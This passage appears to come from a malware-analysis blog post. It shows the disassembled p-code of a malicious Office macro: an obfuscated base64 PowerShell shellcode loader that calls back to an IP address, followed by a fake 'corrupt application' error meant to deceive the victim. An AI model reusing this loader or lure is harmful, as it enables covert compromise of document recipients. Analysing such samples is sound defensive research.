       LitStr 0x0320 "ZgAsADAAeAA3ADUALAAwAHgAYwBkACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1ACwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMQAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGUANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADgAOQAsADAAeABlADcALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMQAyACwAMAB4ADkANgAsADAAeAA4ADkALAAwAHgAZQAyACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADQALAAwAHgAYwBkACwAMAB4ADgAYgAsADAAeAAwADcALAAwAHgAMAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcA"
       Concat
       LitStr 0x0320 "NQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADYAOQAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMAAsADAAeAAyAGUALAAwAHgAMwA1ACwAMAB4ADAAMAA7ACQAUABkACAAPQAgADAAeAAxADAAMAAyADsAaQBmACAAKAAkAEcAdAAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMgApAHsAJABQAGQAIAA9ACAAJABHAHQALgBMAGUAbgBnAHQAaAB9ADsAJABFAGMAPQAkAFQASQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADIALAAkAFAAZAAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAEIAQgA9ADAAOwAkAEIAQgAgAC0AbABlACAAKAAkAEcAdAAuAEwAZQBuAGcAdABoAC0AMQApADsAJABCAEIAKwArACkAIAB7ACQAVABJADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQARQBjAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEIAQgApACwAIAAkAEcAdABbACQAQgBCAF0ALAAgADEA"
       Concat
       LitStr 0x0320 "KQB9ADsAJABUAEkAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEUAYwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAUQB2ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGYATgApACkAOwAkAFEAdgBkACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHIASAAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAByAEgAIAAkAFEAdgBkACAAJABRAHYAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwA"
       Concat
       LitStr 0x0027 "bAAgACQAUQB2AGQAIAAkAFEAdgAiADsAfQA=')""
       Concat
       St omVsI
Line #3:
Line #4:
       Dim
       VarDefn GhHqwBBoV
Line #5:
       LitStr 0x0001 "S"
       LitStr 0x0001 "h"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "l"
       Concat
       St GhHqwBBoV
Line #6:
       Dim
       VarDefn TWgKXCEMpLNvAkL
Line #7:
       LitStr 0x0001 "W"
       LitStr 0x0001 "S"
       Concat
       LitStr 0x0001 "c"
       Concat
       LitStr 0x0001 "r"
       Concat
       LitStr 0x0001 "i"
       Concat
       LitStr 0x0001 "p"
       Concat
       LitStr 0x0001 "t"
       Concat
       St TWgKXCEMpLNvAkL
Line #8:
       Dim
       VarDefn duWktH
Line #9:
       Ld TWgKXCEMpLNvAkL
       LitStr 0x0001 "."
       Concat
       Ld GhHqwBBoV
       Concat
       St duWktH
Line #10:
       Dim
       VarDefn zomnqaCVeYJhMzN
Line #11:
       Dim
       VarDefn ifZKwUg
Line #12:
       SetStmt
       Ld duWktH
       Ld VBA
       ArgsMemLd CreateObject 0x0001
       Set zomnqaCVeYJhMzN
Line #13:
       Dim
       VarDefn hCiSSPdnGWigF
Line #14:
       LitStr 0x0001 "p"
       LitStr 0x0001 "o"
       Concat
       LitStr 0x0001 "w"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "r"
       Concat
       LitStr 0x0001 "s"
       Concat
       LitStr 0x0001 "h"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "."
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "x"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 " "
       Concat
       St hCiSSPdnGWigF
Line #15:
       Ld hCiSSPdnGWigF
       Ld omVsI
       Concat
       LitDI2 0x0000
       LitVarSpecial (False)
       Ld zomnqaCVeYJhMzN
       ArgsMemLd Run 0x0003
       St ifZKwUg
Line #16:
       Dim
       VarDefn title (As String)
Line #17:
       LitStr 0x0039 "Microsoft Office Corrupt Application (Compatibility Mode)"
       St title
Line #18:
       Dim
       VarDefn msg (As String)
Line #19:
       Dim
       VarDefn intResponse (As Integer)
Line #20:
       LitStr 0x00AE "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
       St msg
Line #21:
       Ld msg
       LitDI2 0x0010
       Ld title
       ArgsLd MsgBox 0x0003
       St intResponse
Line #22:
       Ld Application
       ArgsMemCall Quit 0x0000
Line #23:
       EndSub
Line

About the Author

KN

Kurt Natvig

Principal Research Scientist

Kurt Natvig is a Principal Research Scientist in Forcepoint's Innovation Lab. The Innovation Lab focuses on reducing the engineering-risk by researching and implementing proof-of-concepts beyond the roadmap.

Kurt is also heavily involved in reverse engineering malware and performs...